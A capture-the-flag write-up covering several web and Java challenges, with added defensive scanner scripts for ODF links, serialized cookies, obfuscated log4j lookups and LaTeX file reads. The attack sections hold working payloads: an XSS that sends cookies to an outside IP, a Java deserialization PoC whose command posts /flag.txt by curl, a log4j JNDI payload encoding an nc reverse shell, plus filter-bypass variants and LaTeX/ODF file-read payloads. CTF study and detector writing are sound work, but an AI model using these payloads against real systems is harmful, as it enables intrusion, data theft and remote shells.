
securinets-CTF

Document-Converter

  • LibreOffice
  • PDF

https://10nf0x.medium.com/egctf-2019-final-secure-document-portal-v2-70c1e23110f3

https://buer.haus/2019/10/18/a-tale-of-exploitation-in-spreadsheet-file-conversions/

A LibreOffice vulnerability. The challenge lets you upload doc, jpg and gif files and converts them to PDF; just follow the steps in the articles.

Insert an OLE object. The file has to exist locally for this step; on a Linux machine that isn't necessary, just use /flag directly.

Save as odt, then rename it to doc.

Open it with an archive tool and change the URL to the file protocol.

Then I found that only two or three lines could be read; the article's author also gives a payload:

<text:section text:name="string">
<text:section-source xlink:href="file:///flag" xlink:type="simple" xlink:show="embed" xlink:actuate="onLoad"/>
</text:section>
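A converter can refuse such a document before LibreOffice ever opens it. The following is an added example (my code, not the challenge author's and not part of LibreOffice): it opens the upload as a zip container by content rather than by extension, since the document above was renamed from .odt to .doc, and reports every xlink:href in the package that carries a URL scheme such as file:// or http://, whether it sits on a text:section-source as above or on any other element such as a linked draw:object. The two in-memory packages are constructed test inputs.

```python
import re
import zipfile
from io import BytesIO
import xml.etree.ElementTree as ET

XLINK_HREF = "{http://www.w3.org/1999/xlink}href"
# Anything starting with "scheme:" (file:, http:, ftp:, ...) points outside the
# package; legitimate package-internal links look like "Pictures/x.png".
SCHEME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9+.\-]*:")
# Package parts that may carry links (the manifest normally has none, but is cheap to check).
LINK_PARTS = ("content.xml", "styles.xml", "META-INF/manifest.xml")


def external_links(doc_bytes):
    """Return (part, element tag, href) for every xlink:href in the ODF package
    whose target lies outside the package. Raises zipfile.BadZipFile when the
    bytes are not a zip container at all, whatever the file extension says."""
    found = []
    with zipfile.ZipFile(BytesIO(doc_bytes)) as zf:
        for part in LINK_PARTS:
            if part not in zf.namelist():
                continue
            root = ET.fromstring(zf.read(part))
            for el in root.iter():
                href = el.get(XLINK_HREF)
                if href and SCHEME_RE.match(href):
                    found.append((part, el.tag, href))
    return found


def safe_to_convert(doc_bytes):
    """Policy hook for the converter: only link-free packages go on to LibreOffice."""
    return not external_links(doc_bytes)


def build_odt(content_xml):
    """Constructed minimal ODF package (test input, not a real LibreOffice save)."""
    buf = BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("mimetype", "application/vnd.oasis.opendocument.text")
        zf.writestr("content.xml", content_xml)
    return buf.getvalue()


ODF_NS = ('xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" '
          'xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0" '
          'xmlns:draw="urn:oasis:names:tc:opendocument:xmlns:drawing:1.0" '
          'xmlns:xlink="http://www.w3.org/1999/xlink"')

# Constructed sample: the section-source payload from the write-up above.
MALICIOUS_CONTENT = f"""<?xml version="1.0" encoding="UTF-8"?>
<office:document-content {ODF_NS}><office:body><office:text>
<text:section text:name="string">
<text:section-source xlink:href="file:///flag" xlink:type="simple" xlink:show="embed" xlink:actuate="onLoad"/>
</text:section>
</office:text></office:body></office:document-content>"""

# Constructed sample: an ordinary document whose only link is package-internal.
BENIGN_CONTENT = f"""<?xml version="1.0" encoding="UTF-8"?>
<office:document-content {ODF_NS}><office:body><office:text>
<text:p>hello</text:p><draw:frame><draw:image xlink:href="Pictures/logo.png"/></draw:frame>
</office:text></office:body></office:document-content>"""

if __name__ == "__main__":
    for label, xml in (("malicious", MALICIOUS_CONTENT), ("benign", BENIGN_CONTENT)):
        print(label, external_links(build_odt(xml)))
```

Scanning the XML is a filter in front of the converter, not a replacement for running LibreOffice as an unprivileged user in a container with no readable secrets; the check is cheap enough to apply to every upload, and a hit is worth logging with the href so the rejected document can be reviewed.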

Securinets{1t_was_So_easy!!!}

planetsheet

  • XSLT
  • XSS

The challenge is an XSS one and has a report page.

While testing I noticed the page was odd: it was not normal HTML. Searching for the keyword xsl showed that it uses XSLT to transform XML into XHTML.

Then I searched for XSS injection under different Content-Types:

https://github.com/BlackFan/content-type-research/blob/master/XSS.md

payload

<x:script xmlns:x="http://www.w3.org/1999/xhtml">window.open('http://1.116.110.61:4000'+document.cookie)</x:script>

BrokenParr0t

  • gadgetinspector

A Java deserialization challenge. Analyze it directly with jd-gui or with the online decompiler https://jdec.app/.

Here the cookie is base64-decoded and then deserialized. There was one point I did not understand here: (Question).

In utils.QuestionCompar, internal is base64-decoded a second time, and the compare function then deserializes it.

Finally it reaches services.Author; by making the hashCode of uuid equal 0, we get code execution.

In other words, (Question)inp.readObject(); has to reach QuestionCompar and call its compare method. As in the CC2 chain, PriorityQueue is used to call an arbitrary compare method.

poc

import com.securinets.services.Author;
import com.securinets.utils.QuestionCompar;
import java.io.*;
import java.util.*;
import java.lang.reflect.*;

class exploit {
    public static void main(String[] args) throws Exception {
        Author author = new Author();
        // Set the fields
        setFieldValue(author, "name", "curl http://1.116.110.61:4000/ -d @/flag.txt");
        setFieldValue(author, "uuid", "");
        // Serialize
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
        objectOutputStream.writeObject(author);
        objectOutputStream.close();
        // Produce the base64 that the server decodes a second time
        String evilcode = Base64.getEncoder().encodeToString(byteArrayOutputStream.toByteArray());

        QuestionCompar questionCompar = new QuestionCompar();
        setFieldValue(questionCompar, "internal", evilcode);

        PriorityQueue<Integer> priorityQueue = new PriorityQueue<>(2, questionCompar);
        priorityQueue.add(1);
        priorityQueue.add(1);

        serialize(priorityQueue);
    }

    // Set a private field by reflection
    public static void setFieldValue(Object object, String fieldName, Object value) throws Exception {
        Field field = object.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(object, value);
    }

    // Serialize the object and print it as base64 (the outer cookie value)
    public static void serialize(Object obj) throws Exception {
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(baos);
        oos.writeObject(obj);
        oos.close();
        System.out.println(new String(Base64.getEncoder().encode(baos.toByteArray())));
    }
}

FLAG: Securinets{DouBlE_SeRiaLisAtion_AnD_J4Va_S0_Ann0yInG}

gadgetinspector is a Java bytecode analysis tool from Netflix's security team for finding gadget chains. It is useful in white-box attacks: a tool for finding chains.
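The cookie in this challenge is base64 of a Java serialization stream that itself carries a second base64-encoded stream in QuestionCompar.internal. A request filter or a log-review script can spot that shape without deserializing anything: every Java stream starts with the bytes AC ED 00 05, and class names sit behind TC_CLASSDESC (0x72) markers. The following is an added example of such a detector (my code, not the challenge's and not a real library). The sample cookie is constructed by helpers that only mimic the stream header, class descriptors and a string field, so it is not something ObjectOutputStream produced; the class names are the ones from the write-up above.

```python
import base64
import binascii
import re

JAVA_STREAM_MAGIC = b"\xac\xed\x00\x05"   # STREAM_MAGIC + STREAM_VERSION
TC_OBJECT = 0x73
TC_CLASSDESC = 0x72
TC_STRING = 0x74
# Runs of base64 alphabet long enough to hold another stream header.
BASE64_RUN = re.compile(rb"[A-Za-z0-9+/]{16,}={0,2}")
CLASSNAME_RE = re.compile(r"^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$")


def try_b64decode(data):
    """Strict base64 decode; None when the input is not valid base64."""
    try:
        return base64.b64decode(data, validate=True)
    except (binascii.Error, ValueError):
        return None


def class_names(stream):
    """Heuristic scan for class descriptors: TC_CLASSDESC, a 2-byte big-endian
    length, then the class name. A 0x72 byte that merely occurs inside string
    data almost never yields a plausible length plus an identifier-shaped name."""
    names = []
    i = 0
    while i + 3 <= len(stream):
        if stream[i] == TC_CLASSDESC:
            length = int.from_bytes(stream[i + 1:i + 3], "big")
            candidate = stream[i + 3:i + 3 + length]
            if 0 < length == len(candidate):
                text = candidate.decode("ascii", errors="replace")
                if CLASSNAME_RE.match(text):
                    names.append(text)
                    i += 3 + length
                    continue
        i += 1
    return names


def serialization_layers(cookie, depth=0, max_depth=3):
    """Return [(depth, [class names])] for every Java serialization stream found
    in a base64 cookie, descending into base64 blobs embedded in each stream."""
    raw = try_b64decode(cookie)
    if raw is None or not raw.startswith(JAVA_STREAM_MAGIC) or depth > max_depth:
        return []
    layers = [(depth, class_names(raw))]
    for match in BASE64_RUN.finditer(raw):
        layers.extend(serialization_layers(match.group(0), depth + 1, max_depth))
    return layers


def is_java_serialized(cookie):
    """Decision a request filter would make: reject any cookie carrying a stream."""
    return bool(serialization_layers(cookie))


def fake_stream(class_name, trailer=b""):
    """Constructed stand-in for a serialized object of class_name: magic, TC_OBJECT,
    TC_CLASSDESC, the name, then whatever trailer the caller supplies. It is only
    shaped like a real stream; ObjectInputStream would reject it."""
    name = class_name.encode()
    return (JAVA_STREAM_MAGIC + bytes([TC_OBJECT, TC_CLASSDESC])
            + len(name).to_bytes(2, "big") + name + trailer)


def fake_string(text):
    """Constructed TC_STRING field: tag, 2-byte length, the string bytes."""
    data = text.encode()
    return bytes([TC_STRING]) + len(data).to_bytes(2, "big") + data


# Constructed double-serialization cookie in the shape the write-up describes:
# PriorityQueue -> QuestionCompar whose 'internal' holds base64 of an Author stream.
INNER = base64.b64encode(fake_stream("com.securinets.services.Author", b"\x00" * 8)).decode()
QC = b"com.securinets.utils.QuestionCompar"
comparator_desc = bytes([TC_CLASSDESC]) + len(QC).to_bytes(2, "big") + QC + fake_string(INNER)
SAMPLE_COOKIE = base64.b64encode(fake_stream("java.util.PriorityQueue", comparator_desc)).decode()
PLAIN_COOKIE = base64.b64encode(b"session=7f3a1c9e").decode()

if __name__ == "__main__":
    for depth, names in serialization_layers(SAMPLE_COOKIE):
        print(f"layer {depth}: {names}")
```

On the server side the same signal belongs in an ObjectInputFilter (Java 9+) or a class allowlist on the ObjectInputStream, so that PriorityQueue and comparator classes are never resolved from a cookie in the first place; the scanner above is the outside view that a WAF or a SOC rule gets.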

NarutoKeeper

  • XSLeak

After registering and logging in, the challenge offers an add-article feature, a fuzzy search feature and a report feature. The flag is in an article under the admin account. Report an evil HTML page hosted on a VPS to admin so that it executes JS, which drives the search feature to test the flag character by character and checks the status code: a 302 means that character of the flag is right. Then exfiltrate the data.

The next character of the flag is correct.

As for the actual code, I couldn't write it…

MISC

MISC had several log4j bypass challenges. I didn't get the third one and will come back to it; I think it uses the other two methods, but after several tries there was no echo.

https://www.cnblogs.com/peace-and-romance/p/15717457.html

When I opened the attachment, I found log4j.

Under the login route, log4j is triggered via the username, so I tried it with dnslog:

${jndi:ldap://sl155b.dnslog.cn}

Received an echo.

So I generated the payload as usual:

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 150.158.181.145

using a command for a reverse shell:

// the base64 string is a reverse shell using the nc command
${jndi:ldap://150.158.181.145:1389/Basic/Command/Base64/bmMgMS4xMTYuMTEwLjYxIDQwMDAgLWUgL2Jpbi9zaA==}

My VPS received it and automatically sent some payloads.

Then nc on my port to receive the shell.

misc2 adds some filters; I used this payload to bypass it:

${${env:TEST:-j}ndi${env:TEST:-:}${env:TEST:-l}dap${env:TEST:-:}//150.158.181.145:1389/Basic/Command/Base64/(base64 code)}
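The bypass above works because Log4j resolves the nested lookups before it ever sees the outer `${jndi:...}`, while a filter that greps for the literal string `${jndi:` only sees the obfuscated form. A detector can perform the same resolution the attacker relies on. The following is an added example (my code, not from the write-up or from any scanner): it resolves innermost lookups first, takes the `:-` default for lookups whose variable is assumed unset (the attacker cannot set TEST on the server), applies `lower`/`upper`, and then matches on the normalized string. The log lines are constructed and use the placeholder host attacker.example.

```python
import re

# Innermost ${...}: a lookup whose body contains no further "${" or "}".
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# What we are looking for once the obfuscation has been unwound.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def resolve_lookup(body):
    """Approximate one Log4j lookup, for detection purposes only:
    - "prefix:key:-default" yields the default (the env/sys/... variable is
      assumed unset, which is exactly what the bypass relies on);
    - lower:/upper: transform their argument;
    - anything else (jndi:, date:, ...) is left in place, unresolved."""
    if ":-" in body:
        return body.split(":-", 1)[1]
    prefix, _, arg = body.partition(":")
    if prefix.lower() == "lower":
        return arg.lower()
    if prefix.lower() == "upper":
        return arg.upper()
    return "${" + body + "}"


def normalize(text, max_rounds=10):
    """Repeatedly resolve innermost lookups until nothing changes."""
    for _ in range(max_rounds):
        changed = False

        def substitute(match):
            nonlocal changed
            resolved = resolve_lookup(match.group(1))
            if resolved != match.group(0):
                changed = True
            return resolved

        text = INNERMOST.sub(substitute, text)
        if not changed:
            break
    return text


def find_jndi(lines):
    """Return (line index, normalized line) for every line that contains a
    JNDI lookup after the obfuscation has been unwound."""
    hits = []
    for index, line in enumerate(lines):
        normalized = normalize(line)
        if JNDI_LOOKUP.search(normalized):
            hits.append((index, normalized))
    return hits


# Constructed sample log lines (placeholder host attacker.example).
SAMPLE_LOG = [
    'POST /login username="${jndi:ldap://attacker.example:1389/a}"',
    'POST /login username="${${env:TEST:-j}ndi${env:TEST:-:}${env:TEST:-l}dap${env:TEST:-:}//attacker.example:1389/a}"',
    'POST /login username="${${lower:J}${upper:n}di:rmi://attacker.example:1099/a}"',
    'GET /report?when=${date:yyyy-MM-dd}',
    'POST /login username="alice"',
]

if __name__ == "__main__":
    for index, normalized in find_jndi(SAMPLE_LOG):
        print(index, normalized)
```

Normalizing before matching is how a WAF or SIEM rule keeps up with the `${env:X:-c}` and `${lower:c}` letter-by-letter tricks without a signature per variant; the definitive fix remains upgrading Log4j past the vulnerable versions, which removes the JNDI lookup from message formatting altogether.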

sourcer

Hey, I’ve built a tool to view source code. Is it secure?

Getting the source:

<?php
// Challenge by @gehaxelt.
include "config.php";

function showcode($file) {
    $source = show_source($file, true);
    print $source;
    exit(0);
}

if(isset($_GET['src'])) {
    showcode("index.php");
}

if(isset($_GET['file'])) {
    $file = $_GET['file'];
    if(str_contains($file, "..")) {
        die("No automated tools pls.");
    }

    // file_exists() accepts stream wrappers, so $file can be a URL such as ftp://
    if(!file_exists($file . FLAG . ".php")) {
        die("File not found :-/");
    }

    showcode($file);
}
?>

Too obvious: file_exists goes out to the FTP server, and the requested path leaks the flag.

// start an FTP server on the VPS
python3 -m pyftpdlib -p 21
// payload
?file=ftp://1.116.110.61:21/

FLAG: ENO{F1L3_Exists_FTP_fun_in_PHP}

Texnology

Online LaTeX editors are quite famous now, but are the associated risks as well?

Hint: The flag is at /FLAG.

LaTeX is compiled to a PDF file, and there is a blacklist, so find a file-read payload. There seems to be an unintended solution here, though: letter case is not checked.

\newread\file
\openin\file=/FLAg
\loop\unless\ifeof\file
\read\file to\fileline
\text{\fileline}
\repeat
\closein\file

The flag appears in the generated PDF.

FLAG:ENO{L4T3x_H4ck1Ng_R3L04D3D_OK!}

Texnology (Fixed)

Just bypass it: define the pieces with \def, then concatenate the variables.

payload

\def \fl {/FL}
\def \ag {AG.php}
\def \arg {\fl\ag}
\arg
\newread\file
\openin\file=\arg
\loop\unless\ifeof\file
\read\file to\fileline
\fileline
\repeat
\closein\file
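Both Texnology solutions above defeat a filter that looks for the path string: the first with a different letter case, the second by assembling the path from macros so that /FLAG never appears in the source. A filter that instead refuses the primitives that read files cannot be split that way, because `\openin` and `\read` still have to be spelled out for TeX to execute them. The following is an added example (my code; the challenge's real filter is not on the page, so the path blacklist here is an assumed stand-in for it) that contrasts the assumed path blacklist with a primitive-based check on the two payloads above. TeX control-sequence names are case-sensitive, so the primitive check is exact-case, and `%` comments are stripped first so that a primitive merely mentioned in a comment does not raise a false alarm.

```python
import re

# Assumed shape of the original challenge filter: a literal, case-sensitive
# blacklist of the flag path (the page does not show the real filter).
BLOCKED_STRINGS = ("/FLAG",)

# Primitives and macros through which TeX can read files, run commands, or
# assemble a control-sequence name at run time. Control-sequence names are
# case-sensitive in TeX, so this check is deliberately exact-case.
FILE_ACCESS = re.compile(
    r"\\(openin|openout|read|readline|input|include|InputIfFileExists|"
    r"write18|csname)(?![A-Za-z])"
)
# A "%" starts a comment unless it is escaped as "\%".
COMMENT = re.compile(r"(?<!\\)%[^\n]*")


def path_blacklist_allows(source):
    """Naive filter: the document passes as long as no blocked string appears verbatim."""
    return not any(blocked in source for blocked in BLOCKED_STRINGS)


def primitive_filter_allows(source):
    """Hardened filter: reject any use of a file-reading primitive, whatever
    path it targets and however that path is spelled or assembled."""
    code_only = COMMENT.sub("", source)
    return FILE_ACCESS.search(code_only) is None


# The two payloads from the write-up above, unchanged.
CASE_BYPASS = r"""\newread\file
\openin\file=/FLAg
\loop\unless\ifeof\file
\read\file to\fileline
\text{\fileline}
\repeat
\closein\file"""

DEF_BYPASS = r"""\def \fl {/FL}
\def \ag {AG.php}
\def \arg {\fl\ag}
\arg
\newread\file
\openin\file=\arg
\loop\unless\ifeof\file
\read\file to\fileline
\fileline
\repeat
\closein\file"""

# Constructed benign document, with a comment that mentions a primitive.
BENIGN = r"""\documentclass{article}
% \openin is only named in this comment
\begin{document}
Hello, \textbf{world}: 100\% safe.
\end{document}"""


def compare(source):
    """Return (path blacklist verdict, primitive filter verdict); True means allowed."""
    return path_blacklist_allows(source), primitive_filter_allows(source)


if __name__ == "__main__":
    for name, doc in (("case", CASE_BYPASS), ("def", DEF_BYPASS), ("benign", BENIGN)):
        print(name, compare(doc))
```

A source filter is still only the outer layer: the control that actually stops `\openin` from reaching /FLAG is the TeX installation itself, with `openin_any = p` (paranoid) in texmf.cnf so that reads are confined to the working directory, shell escape disabled, and the compiler run as an unprivileged user in a sandbox that holds nothing worth reading.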

FLAG: ENO{L4T3x_H4ck1Ng_R3L04D3D_OK_N0t_BugGy_!}